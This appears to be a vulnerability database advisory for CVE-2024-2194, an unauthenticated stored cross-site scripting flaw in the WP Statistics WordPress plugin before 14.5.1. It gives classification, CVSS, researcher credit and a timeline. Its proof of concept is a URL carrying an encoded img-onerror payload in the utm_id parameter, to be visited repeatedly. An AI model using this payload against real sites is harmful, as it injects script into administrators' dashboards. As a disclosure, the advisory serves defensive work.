WP Statistics < 14.5.1 – Unauthenticated Stored Cross-Site Scripting | CVE 2024-2194

Description

The plugin does not properly escape visited URLs which are reflected on the plugin's dashboard.

Proof of Concept

Visit one same page multiple times so it makes it to the most visited pages, adding the following "utm_id" parameter to it:

http://vulnerable-site.tld/attacked-page/?utm_id=%22%3e%3cimg%2Fsrc=x%20onerror%3Dalert(123)%2F%2F%3e

Affects Plugins

wp-statistics

Fixed in 14.5.1

References

CVE

CVE-2024-2194

URL

https://www.wordfence.com/threat-intel/vulnerabilities/id/e44e4bdd-d84e-4315-9232-48a3b240242d

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CWE-79

CVSS

7.2 (high)

Miscellaneous

Original Researcher

Tim Coen

Verified

Yes

WPVDB ID

56779ee5-5bf4-47d2-bbaf-b398ea926fbe

Timeline

Publicly Published

2024-03-11 (about 2 years ago)

Added

2024-03-13 (about 2 years ago)

Last Updated

2024-03-13 (about 2 years ago)

Other

Published

Title

Published

2019-07-17

Title

All-in-One WP Migration < 7.0 - Authenticated Cross-Site Scripting (XSS)

Published

2023-08-29

Title

Bridge Core < 3.1.0 - Reflected XSS

Published

2025-01-06

Title

WP Triggers Lite <= 2.5.3 - Admin+ SQL Injection

Published

2024-10-03

Title

Memberful – Membership Plugin < 1.73.8 - Authenticated (contributor+) Stored Cross-Site Scripting

Published

2024-01-08

Title

Formidable Forms < 6.7.1 - Admin+ Stored Cross-Site Scripting